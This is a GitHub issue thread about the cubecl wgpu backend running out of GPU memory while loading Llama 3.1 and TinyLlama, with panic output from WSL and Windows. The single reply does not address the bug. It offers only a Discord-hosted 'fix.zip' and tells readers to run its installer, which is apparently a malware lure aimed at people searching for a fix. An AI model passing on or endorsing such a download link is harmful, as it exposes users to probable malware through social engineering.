### ISSUE TITLE
[wgpu] Memory management strategy too greedy?

### ISSUE THREAD

**Issue by laggui** [tracel-ai/cubecl#90]
Trying to run [Llama 3.1](https://github.com/tracel-ai/models/pull/38) (and even TinyLlama, which I was previously able to use) on wgpu I get an error due to lack of memory.

On WSL:
```
Loading record...
thread 'main' panicked at /home/laggui/.cargo/registry/src/index.crates.io-6f17d22bba15001f/cubecl-runtime-0.2.0/src/memory_management/dynamic.rs:156:9:
No memory pool big enough to reserve 262144000 bytes.
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
```

On Windows:
```
Loading record...
thread 'main' panicked at C:\Users\guila\.cargo\registry\src\index.crates.io-6f17d22bba15001f\wgpu-22.1.0\src\backend\wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In Device::create_buffer
    Not enough memory left.


note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
error: process didn't exit successfully: `target\release\examples\chat.exe` (exit code: 101)
```

My notebook only has 6GB VRAM but I can run with any other backend no problem.
I know other users on discord have reported a similar issue even with 4090s.

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
